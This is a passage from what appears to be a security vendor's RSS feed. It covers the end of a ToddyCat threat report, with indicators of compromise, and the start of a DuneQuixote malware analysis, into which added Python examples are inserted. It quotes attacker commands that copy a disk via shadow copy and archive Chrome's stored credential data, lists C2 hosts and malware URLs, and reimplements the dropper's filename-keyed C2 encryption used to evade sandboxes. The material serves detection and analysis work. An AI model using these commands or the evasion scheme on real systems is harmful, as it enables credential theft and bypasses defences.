class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
  1448. <p>In several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the <strong>User Data</strong> folder with <a href="https://www.7-zip.org/" target="_blank" rel="noopener">7-Zip</a> for further exfiltration.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
  1449. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
  1450. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\&lt;username&gt;\AppData\Local\Google\
  1451. Chrome\"User Data\"</pre><p>
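<p>The shadow copy and 7-Zip commands quoted above are a good basis for a process-creation detection: neither a shadow copy nor an archiver is suspicious on its own, but an archiver (or any copy tool) reading browser profile data through the HarddiskVolumeShadowCopy device path is. The Python below is an added example, not code from the report; the event records and host names in it are constructed, and the field names (host, time, cmd) are assumptions for a generic process-creation event such as Sysmon Event ID 1 or Windows 4688.</p>

```python
"""Process-creation detection for browser data collected through a volume shadow copy.

Added example, not code from the Securelist report. Events are constructed; the
first two mirror the commands quoted in the report.
"""
import re

# Shadow copy creation via wmic (as in the report) or vssadmin.
SHADOW_CREATE_RE = re.compile(
    r"\bshadowcopy\s+call\s+create\b|\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
# Any access to the raw shadow copy device path.
SHADOW_PATH_RE = re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I)
# Chrome or Edge profile root, with or without the quoting seen in the report.
BROWSER_DATA_RE = re.compile(r"\\(?:Google\\Chrome|Microsoft\\Edge)\\[\"']?User Data", re.I)
# A 7-Zip binary (any name starting with 7z, e.g. 7z6.exe) invoked with the 'a' (add) command.
ARCHIVER_RE = re.compile(r"(?:^|[\\\s\"])7z[a-z0-9]*\.exe\b.*\s+a\s+", re.I)

# Constructed process-creation events: host, seconds offset, command line.
EVENTS = [
    {"host": "WS01", "time": 0, "cmd": r"wmic shadowcopy call create Volume='C:\'"},
    {"host": "WS01", "time": 40,
     "cmd": r'"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r '
            r'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\jdoe\AppData\Local\Google\Chrome\"User Data\"'},
    {"host": "WS02", "time": 10, "cmd": r"7z.exe a C:\Backups\projects.7z C:\Projects"},
    {"host": "WS03", "time": 5, "cmd": r"vssadmin create shadow /for=C:"},
    {"host": "WS03", "time": 900,
     "cmd": r"robocopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Users\asmith\AppData\Local\Microsoft\Edge\User Data C:\Temp\ud /E"},
]


def classify(cmdline):
    """Tag a command line with the behaviours relevant to this technique."""
    tags = set()
    if SHADOW_CREATE_RE.search(cmdline):
        tags.add("shadow_create")
    if SHADOW_PATH_RE.search(cmdline):
        tags.add("shadow_path")
    if BROWSER_DATA_RE.search(cmdline):
        tags.add("browser_data")
    if ARCHIVER_RE.search(cmdline):
        tags.add("archiver")
    return tags


def detect(events, window_s=600):
    """Correlate per host: alert when browser profile data is read via a shadow copy path.

    A preceding shadow copy creation within window_s seconds is added to the
    reason as supporting context but is not required, since the copy may have
    been created by a legitimate backup job the attacker simply reused.
    """
    alerts = []
    by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        last_create = None
        for ev in evs:
            tags = classify(ev["cmd"])
            if "shadow_create" in tags:
                last_create = ev["time"]
            if "shadow_path" in tags and "browser_data" in tags:
                reason = "browser profile read via shadow copy device path"
                if "archiver" in tags:
                    reason += " and archived"
                if last_create is not None and ev["time"] - last_create <= window_s:
                    reason += "; shadow copy created %ds earlier" % (ev["time"] - last_create)
                alerts.append({"host": host, "severity": "high", "reason": reason, "cmd": ev["cmd"]})
            elif "shadow_path" in tags and "archiver" in tags:
                alerts.append({"host": host, "severity": "medium",
                               "reason": "archiver reading from a shadow copy", "cmd": ev["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["host"], alert["severity"], alert["reason"])
```

The rule also fires on a plain copy tool reading Edge profile data out of a shadow copy (the WS03 record), so it generalizes beyond the 7-Zip case quoted on the page, while the ordinary backup on WS02 produces no alert.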
  1452. <h2 id="conclusion">Conclusion</h2>
  1453. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
  1454. <p>To protect the organization&#8217;s infrastructure, we recommend adding the resources and IP addresses of cloud services that provide traffic tunneling to the firewall denylist. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as doing so helps attackers access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.</p>
  1455. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1456. <p><strong>Files</strong></p>
  1457. <table width="100%">
  1458. <tbody>
  1459. <tr>
  1460. <td width="60%"><a href="https://opentip.kaspersky.com/1D2B32910B500368EF0933CDC43FDE0B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
  1461. <td width="40%">WAExp</td>
  1462. </tr>
  1463. <tr>
  1464. <td><a href="https://opentip.kaspersky.com/5C2870F18E64A14A64ABF9A56F5B6E6B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
  1465. <td>WAExp</td>
  1466. </tr>
  1467. <tr>
  1468. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
  1469. <td>cuthead</td>
  1470. </tr>
  1471. <tr>
  1472. <td><a href="https://opentip.kaspersky.com/C7D8266C63F8AECA8D5F5BDCD433E72A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
  1473. <td>cuthead</td>
  1474. </tr>
  1475. <tr>
  1476. <td><a href="https://opentip.kaspersky.com/750EF49AFB88DDD52F6B0C500BE9B717/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
  1477. <td>TomBerBil</td>
  1478. </tr>
  1479. <tr>
  1480. <td><a href="https://opentip.kaspersky.com/853A75364D76E9726474335BCD17E225/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
  1481. <td>TomBerBil</td>
  1482. </tr>
  1483. <tr>
  1484. <td><a href="https://opentip.kaspersky.com/BA3EF3D0947031FB9FFBC2401BA82D79/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
  1485. <td>Krong</td>
  1486. </tr>
  1487. </tbody>
  1488. </table>
  1489. <p><strong>Legitimate tools</strong></p>
  1490. <table width="100%">
  1491. <tbody>
  1492. <tr>
  1493. <td width="60%"><a href="https://opentip.kaspersky.com/4A79A8B1F6978862ECFA71B55066AADD/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
  1494. <td width="40%">FRP client</td>
  1495. </tr>
  1496. <tr>
  1497. <td><a href="https://opentip.kaspersky.com/1F514121162865A9E664C919E71A6F62/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
  1498. <td>vpnserver_x64.exe</td>
  1499. </tr>
  1500. <tr>
  1501. <td><a href="https://opentip.kaspersky.com/6F32D6CFAAD3A956AACEA4C5A5C4FBFE/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
  1502. <td>vpnserver_x64.exe</td>
  1503. </tr>
  1504. <tr>
  1505. <td><a href="https://opentip.kaspersky.com/9DC7237AC63D552270C5CA27960168C3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
  1506. <td>ngrok.exe</td>
  1507. </tr>
  1508. <tr>
  1509. <td><a href="https://opentip.kaspersky.com/34985FAE5FA8E9EBAA872DE8D0105005/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
  1510. <td>ngrok.exe</td>
  1511. </tr>
  1512. </tbody>
  1513. </table>
  1514. <p><strong>C2 addresses</strong></p>
  1515. <table width="100%">
  1516. <tbody>
  1517. <tr>
  1518. <td width="40%"><a href="https://opentip.kaspersky.com/103.27.202.85/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
  1519. <td width="60%">SSH server</td>
  1520. </tr>
  1521. <tr>
  1522. <td><a href="https://opentip.kaspersky.com/118.193.40.42/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
  1523. <td>Server from SoftEther VPN</td>
  1524. </tr>
  1525. <tr>
  1526. <td><a href="https://opentip.kaspersky.com/Ha.bbmouseme.com/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
  1527. <td>Server from SoftEther VPN</td>
  1528. </tr>
  1529. </tbody>
  1530. </table>
  1531. <p><strong>Links</strong></p>
  1532. <table width="100%">
  1533. <tbody>
  1534. <tr>
  1535. <td width="75%"><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fmain.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
  1536. <td width="25%">vpnserver_x64.exe</td>
  1537. </tr>
  1538. <tr>
  1539. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fham.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
  1540. <td>Hamcore.se2</td>
  1541. </tr>
  1542. <tr>
  1543. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2F23.106.122.5%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
  1544. <td>Hamcore.se2</td>
  1545. </tr>
  1546. <tr>
  1547. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Ftasklist.exe/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
  1548. <td>vpnserver_x64.exe</td>
  1549. </tr>
  1550. <tr>
  1551. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
  1552. <td>Hamcore.se2</td>
  1553. </tr>
  1554. </tbody>
  1555. </table>
  1556. ]]></content:encoded>
  1557. <wfw:commentRss>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/feed/</wfw:commentRss>
  1558. <slash:comments>2</slash:comments>
  1559. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  1560. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1561. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  1562. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1563. </item>
  1564. <item>
  1565. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
  1566. <link>https://securelist.com/dunequixote/112425/</link>
  1567. <comments>https://securelist.com/dunequixote/112425/#respond</comments>
  1568. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1569. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
  1570. <category><![CDATA[APT reports]]></category>
  1571. <category><![CDATA[APT]]></category>
  1572. <category><![CDATA[Backdoor]]></category>
  1573. <category><![CDATA[Dropper]]></category>
  1574. <category><![CDATA[DuneQuixote]]></category>
  1575. <category><![CDATA[Malware]]></category>
  1576. <category><![CDATA[Malware Descriptions]]></category>
  1577. <category><![CDATA[Malware Technologies]]></category>
  1578. <category><![CDATA[Middle East]]></category>
  1579. <category><![CDATA[Targeted attacks]]></category>
  1580. <category><![CDATA[Trojan]]></category>
  1581. <category><![CDATA[APT (Targeted attacks)]]></category>
  1582. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112425</guid>
  1583.  
  1584. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
  1585. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1586. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;, and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions (regular droppers and tampered installer files for the legitimate tool &#8220;Total Commander&#8221;), carried malicious code to download an additional payload in the form of a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.</p>
  1587. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
  1588. <h2 id="initial-dropper">Initial dropper</h2>
  1589. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
  1590. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
  1591. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png" alt="Useless function calls" width="795" height="417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01.png 795w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-300x157.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-768x403.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-667x350.png 667w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-740x388.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122605/Dune_Quixote_01-534x280.png 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
  1592. <p>The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.</p>
  1593. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
  1594. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png" alt="String decryption algorithm" width="595" height="373" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02.png 595w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-300x188.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-558x350.png 558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122633/Dune_Quixote_02-447x280.png 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
  1595. <p>Once the strings have been decrypted, the malware resolves the API functions dynamically, using the standard technique of:</p>
  1596. <ul>
  1597. <li>reading the address of the Process Environment Block (PEB);</li>
  1598. <li>locating <em>kernel32.dll</em> through the loader data in the PEB and finding its export table;</li>
  1599. <li>looking up the address of <em>GetProcAddress</em> in that export table, after which every other API can be resolved by name.</li>
  1600. </ul>
  1601. <p>To obtain the PEB, the malware first decrypts the constant <em>0x60</em>, which is the offset of the PEB pointer within the Thread Environment Block on 64-bit Windows (read through the GS segment register). This detail is of interest because malicious samples and shellcode that use this technique almost always carry the constant in plain text; encrypting it removes an otherwise easily recognizable pattern.</p>
  1602. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png" alt="Getting PEB structure offset" width="426" height="88" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03.png 426w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122701/Dune_Quixote_03-300x62.png 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
  1603. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
  1604. <p>The dropper then decrypts the C2 (Command and Control) address, using a technique designed to keep the C2 hidden from automated malware analysis systems. It first retrieves the filename under which the dropper was executed and concatenates it with one of the hardcoded Spanish poem strings. It then computes the MD5 hash of the concatenated string and uses that hash as the key for decrypting the C2 string. Because many sandboxes rename submitted files (for example, to their hash), the derived key is wrong in those environments and the C2 string never decrypts; an analyst has to run or emulate the sample under its original filename, which may only be known from the delivery context.</p>
  1605. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png" alt="C2 decryption algorithm" width="1024" height="171" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1024x171.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-300x50.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-768x128.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-1536x256.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-740x124.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04-800x134.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17122736/Dune_Quixote_04.png 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
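As an added illustration (not code from the article or from the malware itself) of why this scheme frustrates sandboxes, the following Python models the key derivation and the analyst's counter-move. The poem snippet, filename and C2 URL are constructed; the cipher applied with the MD5 key is assumed to be repeating-key XOR, since the article shows the routine only as a screenshot:

```python
import hashlib
import re
from typing import Iterable, Optional, Tuple

# Constructed sample values (not recovered from the campaign): the name the dropper
# was originally delivered under and one of the embedded poem snippets.
ORIGINAL_NAME = "TotalCommanderSetup.exe"
POEM_SNIPPET = "En un lugar de la Mancha, de cuyo nombre no quiero acordarme"
C2_PLAINTEXT = "https://c2.example.invalid/update"   # .invalid is reserved, never resolves


def own_filename(executable_path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", executable_path)[-1]


def derive_key(executable_path: str, snippet: str) -> bytes:
    """MD5(filename || snippet), as the article describes. Renaming the sample
    (which most automated sandboxes do) silently changes this key."""
    return hashlib.md5((own_filename(executable_path) + snippet).encode("utf-8")).digest()


def xor_with_key(data: bytes, key: bytes) -> bytes:
    # Assumption: the cipher fed with the digest is modelled as repeating-key XOR over
    # the 16 raw digest bytes; the sample's real routine may differ in detail.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_c2(c2: str, executable_path: str, snippet: str) -> bytes:
    """Builder side: what producing a sample bound to a given filename looks like."""
    return xor_with_key(c2.encode("ascii"), derive_key(executable_path, snippet))


def decrypt_c2(blob: bytes, executable_path: str, snippet: str) -> Optional[str]:
    """Dropper side: returns the URL only if the result looks like one, else None."""
    plain = xor_with_key(blob, derive_key(executable_path, snippet))
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.startswith(("http://", "https://")) else None


def recover_c2(blob: bytes, snippet: str, candidate_names: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Analyst side: try filenames seen in telemetry or lures until one decrypts."""
    for name in candidate_names:
        url = decrypt_c2(blob, name, snippet)
        if url is not None:
            return name, url
    return None


if __name__ == "__main__":
    blob = encrypt_c2(C2_PLAINTEXT, "C:\\Users\\victim\\Downloads\\" + ORIGINAL_NAME, POEM_SNIPPET)
    print("original name :", decrypt_c2(blob, ORIGINAL_NAME, POEM_SNIPPET))
    print("renamed sample:", decrypt_c2(blob, "5a04d9067b8cb6bcb916b59dcf53bed3.exe", POEM_SNIPPET))
    print("brute force   :", recover_c2(blob, POEM_SNIPPET, ["setup.exe", ORIGINAL_NAME]))
```

The practical consequence for a detonation pipeline is that the submitted filename must be preserved (or the sample re-run under every filename the delivery artefacts suggest), because a wrong key yields no error, only a blob that never becomes a URL.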
  1606. <p>After decrypting the C2 string, the malware connects to the C2 server to download the payload, sending a specific hardcoded ID as the User-Agent. During our research into the C2 infrastructure, we found that the payload is not served unless this exact User-Agent is supplied. Moreover, the payload appears to be downloadable only once per victim, or only for a brief period after a sample is released into the wild: we were unable to obtain most of the payload implants from the active C2 servers.</p>
  1607. <p>Once the payload has been downloaded into the process&#8217;s memory, the dropper checks for the &#8220;M&#8221; (<em>0x4D</em>) magic byte at the start of the blob. This most likely confirms that the payload carries an MZ signature, i.e. is a PE executable, although only the first byte of the two-byte signature is actually checked.</p>
  1608. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
  1609. <p>The Total Commander installer dropper is built to pass as a <a href="https://www.ghisler.com/" target="_blank" rel="noopener">legitimate Total Commander</a> installer. It is, in fact, the legitimate installer file with a malicious section (<em>.textbss</em>) appended and the entry point modified to point into it. Since the file bytes were changed after signing, the original Authenticode signature no longer verifies, which is a simple check to apply before trusting any installer.</p>
  1610. <p>The installer dropper retains the core functionality of the original dropper, with several key differences. It does not use the Spanish poem strings and does not execute decoy functions. Instead, it implements a series of anti-analysis checks and refuses to connect to the C2 if any of the following conditions is true:</p>
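An added example, not from the article, of how to triage an installer for this kind of tampering without vendor tools: a small pure-Python PE header parser that reports which section holds the entry point and flags an appended, data-named or writable-and-executable entry section. The sample image is a constructed minimal PE32+ header, not a Total Commander file; the section layout and the heuristics are assumptions. Verifying the Authenticode signature itself is a separate step (for instance `signtool verify /pa` or PowerShell's `Get-AuthenticodeSignature`):

```python
import struct
from typing import Dict, List, Optional, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Section names linkers emit for data, not code; an entry point inside one is odd.
DATA_SECTION_NAMES = {".textbss", ".data", ".rdata", ".rsrc", ".reloc", ".bss", ".idata"}


def parse_pe(image: bytes) -> Tuple[int, List[Dict]]:
    """Return (AddressOfEntryPoint, section table) read from a PE image's headers."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "chars": chars})
    return entry_rva, sections


def triage(image: bytes) -> Dict:
    """Flag the tampering pattern described above: entry point moved into an appended section."""
    entry_rva, sections = parse_pe(image)
    findings: List[str] = []
    entry_sec: Optional[Dict] = None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_sec = s
            break
    if entry_sec is None:
        findings.append("entry point 0x%x lies outside every section" % entry_rva)
    else:
        name, chars = entry_sec["name"], entry_sec["chars"]
        if entry_sec is sections[-1] and len(sections) > 1:
            findings.append("entry point is in the last section (%s), typical of an appended section" % name)
        if name in DATA_SECTION_NAMES:
            findings.append("entry point is in %s, a name linkers use for data, not code" % name)
        if not chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append("entry section %s is not marked executable" % name)
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append("entry section %s is writable and executable" % name)
    return {"entry_rva": entry_rva,
            "entry_section": entry_sec["name"] if entry_sec else None,
            "sections": [s["name"] for s in sections],
            "findings": findings}


def build_sample_image(entry_rva: int, specs) -> bytes:
    """Constructed minimal PE32+ header (24-byte optional header, no code bytes),
    containing only what parse_pe reads. Not a Total Commander file."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(specs), 0, 0, 0, 24, 0x22)
    opt = struct.pack("<HBBIIIII", 0x20B, 14, 0, 0, 0, 0, entry_rva, 0x1000)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, ptr, 0, 0, 0, 0, chars)
                     for name, vsize, va, raw, ptr, chars in specs)
    return bytes(dos) + b"PE\0\0" + coff + opt + table


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
# Constructed section layouts: a clean installer-like image, and the same image with an
# appended, executable .textbss section that now holds the entry point.
CLEAN_SPECS = [(b".text", 0x3000, 0x1000, 0x3000, 0x400, CODE),
               (b".rdata", 0x800, 0x4000, 0x800, 0x3400, IMAGE_SCN_MEM_READ)]
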